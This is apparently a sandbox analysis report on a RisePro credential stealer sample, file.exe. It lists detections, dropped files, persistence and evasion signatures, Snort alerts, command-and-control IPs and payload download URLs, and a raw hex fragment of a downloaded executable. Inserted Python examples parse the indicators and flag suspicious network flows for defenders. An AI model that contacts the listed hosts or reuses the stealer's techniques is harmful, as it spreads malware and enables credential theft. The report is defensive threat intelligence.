Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1429350
MD5: d937032f47d04da92a0fa530a7b5b919
SHA1: d07ff5e09b6d39fe506229b156baf87424160ae6
SHA256: 56349484a64abf45ea7b380867d3a2c9dfe9a6554eba52291deabbd35d9eca07
Tags: exe

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Contains functionality to implement multi-threaded time evasion
Creates multiple autostart registry keys
Found stalling execution ending in API Sleep call
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: http://193.233.132.175/server/k/l2.exe Virustotal: Detection: 19%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Virustotal: Detection: 80%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Virustotal: Detection: 80%
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07142EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_07142EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0715CCFD FindFirstFileExW, 0_2_0715CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_0710B2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_0710BAC0
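The scanner verdicts above list the same dropped file once per process that wrote it, so the paths have to be deduplicated before they are usable as indicators. The Python below is an added example from the editor, not part of the Joe Sandbox report: it parses a constructed subset of the lines above into one record per source (Avira label plus ReversingLabs/VirusTotal percentages), collects the `<Name>_<32 hex>` staging directories that recur under %LOCALAPPDATA%, %TEMP% and C:\ProgramData, and turns them into a path regex for hunting. The report does not say how that 32-character suffix is generated; whether it is the MD5 of a short decimal string is this example's own check, computed at run time (for the two suffixes in this report it finds the digits "9" and "2"). Function names and regexes are the example's choices.

```python
import hashlib
import re

# Constructed sample: a subset of the AV Detection lines above, deliberately
# including one exact duplicate, the URL entry, and one non-verdict line.
REPORT_LINES = r"""
Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: http://193.233.132.175/server/k/l2.exe Virustotal: Detection: 19%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Virustotal: Detection: 80%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Virustotal: Detection: 80%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
"""

# One verdict line: "Source: <path or URL> <engine>: <verdict>"; some raw
# exports carry trailing link text ("Perma Link"), which is tolerated.
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<engine>Avira|ReversingLabs|Virustotal): "
    r"(?P<verdict>.*?)\s*(?:Perma Link)?$")
PERCENT_RE = re.compile(r"Detection: (\d+)%")
LABEL_RE = re.compile(r"Label: (\S+)")
# "\<Name>_<32 lowercase hex>\" directory component in a dropped-file path.
STAGED_DIR_RE = re.compile(r"\\([A-Za-z0-9]+)_([0-9a-f]{32})\\")


def parse_report(text: str) -> dict:
    """Return {source: {engine: verdict}}; exact duplicate lines collapse."""
    iocs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a scanner verdict (e.g. static PE information)
        verdict = m["verdict"]
        pct = PERCENT_RE.search(verdict)
        label = LABEL_RE.search(verdict)
        if pct:
            verdict = int(pct[1])          # multi-AV detection rate
        elif label:
            verdict = label[1]             # single-engine detection name
        iocs.setdefault(m["src"], {})[m["engine"]] = verdict
    return iocs


def staged_dirs(iocs: dict) -> dict:
    """Map each 32-hex directory suffix to the set of <Name> prefixes using it."""
    found = {}
    for src in iocs:
        m = STAGED_DIR_RE.search(src)
        if m:
            found.setdefault(m[2], set()).add(m[1])
    return found


def explain_suffixes(suffixes, limit: int = 1000) -> dict:
    """Example's own check: is the suffix MD5 of a short decimal string?"""
    table = {hashlib.md5(str(n).encode()).hexdigest(): str(n) for n in range(limit)}
    return {s: table.get(s) for s in suffixes}


def hunting_regex(found: dict) -> str:
    """Path regex matching any of the observed staging directory names."""
    names = sorted({n for names in found.values() for n in names})
    return r"\\(?:%s)_[0-9a-f]{32}\\" % "|".join(names)


if __name__ == "__main__":
    iocs = parse_report(REPORT_LINES)
    for src, verdicts in iocs.items():
        print(src, verdicts)
    dirs = staged_dirs(iocs)
    print("suffix origin:", explain_suffixes(dirs))
    print("hunt for:", hunting_regex(dirs))
```

The regex produced here is tighter than matching on file names alone: a benign "AdobeUpdater" could exist, but a directory named `<Name>_<32 hex>` containing an executable of the same base name is specific to this dropper's staging scheme.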

Networking

Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49707 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.5:49707
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.47:50500 -> 192.168.2.5:49707
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49707 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49710 -> 193.233.132.175:80
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 193.233.132.47:50500
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 21 Apr 2024 23:18:04 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Fri, 19 Apr 2024 15:26:27 GMTConnection: keep-aliveETag: "66228d23-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 
17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 104.26.5.15
Source: Joe Sandbox View IP Address: 193.233.132.175
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: easy2buy.ae Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.175 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.175 Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA23C0 recv,recv,recv,recv,recv,recv,setsockopt,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,recv,Sleep, 0_2_00BA23C0
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: easy2buy.ae Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 193.233.132.175 Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ipinfo.io
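The long run of "TCP traffic detected without corresponding DNS query" entries above is one of the cheapest C2 heuristics available: a host that opens sessions to a public IP it never resolved is using an address carried inside the binary (the report does find http://193.233.132.175/server/k/l2.exe as a literal string in file.exe's memory). Add a destination port such as 50500 and the RisePro session to 193.233.132.47 stands out even without the Snort signatures. The Python below is an added example from the editor, not part of the report or of any vendor tool: it replays a constructed event stream modelled on this section (DNS answers, then TCP sessions; the db-ip.com resolution is assumed, since the report shows only its TLS session) and flags public destinations with no preceding DNS answer or with a port outside a small common-port set, aggregating repeated sessions the way the identical lines above would be. Field names, the common-port list and the function name are the example's own.

```python
from ipaddress import ip_address

# Constructed event stream modelled on the network section above. Events are
# in time order, which matters: only a DNS answer seen *before* a session
# counts as having resolved its destination.
EVENTS = [
    {"type": "dns", "query": "ipinfo.io", "answers": ["34.117.186.192"]},
    {"type": "tcp", "src": "192.168.2.5", "dst": "34.117.186.192", "dport": 443},
    {"type": "dns", "query": "db-ip.com", "answers": ["104.26.5.15"]},  # assumed
    {"type": "tcp", "src": "192.168.2.5", "dst": "104.26.5.15", "dport": 443},
    {"type": "tcp", "src": "192.168.2.5", "dst": "193.233.132.47", "dport": 50500},
    {"type": "tcp", "src": "192.168.2.5", "dst": "193.233.132.175", "dport": 80},
    {"type": "tcp", "src": "192.168.2.5", "dst": "193.233.132.47", "dport": 50500},
    {"type": "tcp", "src": "192.168.2.5", "dst": "192.168.2.1", "dport": 445},  # LAN
]

# Ports a workstation commonly reaches directly; anything else is worth a look.
COMMON_PORTS = {21, 22, 25, 53, 80, 110, 123, 143, 443, 465, 587, 993, 995}


def audit_flows(events) -> dict:
    """Return {(dst, dport): finding} for suspicious outbound TCP sessions.

    A session is suspicious when its public destination was never returned by
    an earlier DNS answer (hard-coded address) or its port is uncommon.
    Private, loopback and link-local destinations are ignored: direct-to-IP
    traffic inside the LAN is normal.
    """
    resolved = {}   # ip -> set of names that resolved to it so far
    findings = {}
    for ev in events:
        if ev["type"] == "dns":
            for ip in ev["answers"]:
                resolved.setdefault(ip, set()).add(ev["query"])
            continue
        dst, dport = ev["dst"], ev["dport"]
        if not ip_address(dst).is_global:
            continue
        reasons = []
        if dst not in resolved:
            reasons.append("no preceding DNS answer")
        if dport not in COMMON_PORTS:
            reasons.append(f"non-standard port {dport}")
        if not reasons:
            continue
        f = findings.setdefault((dst, dport), {"count": 0, "reasons": reasons, "sources": set()})
        f["count"] += 1
        f["sources"].add(ev["src"])
    return findings


def render(findings: dict) -> list:
    """One summary line per flagged destination, in first-seen order."""
    return [f"{dst}:{dport} x{f['count']} ({'; '.join(f['reasons'])})"
            for (dst, dport), f in findings.items()]


if __name__ == "__main__":
    for line in render(audit_flows(EVENTS)):
        print(line)
```

Run on real Zeek `dns.log`/`conn.log` or Sysmon event 22 and event 3 data, the same ordering rule applies; the main false-positive sources are services that resolve a name once and then cache the address across a log rotation, and infrastructure such as NTP or hard-coded update servers, which belong on an allowlist rather than in COMMON_PORTS.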
Source: file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exe
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.execom
Source: file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exev
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
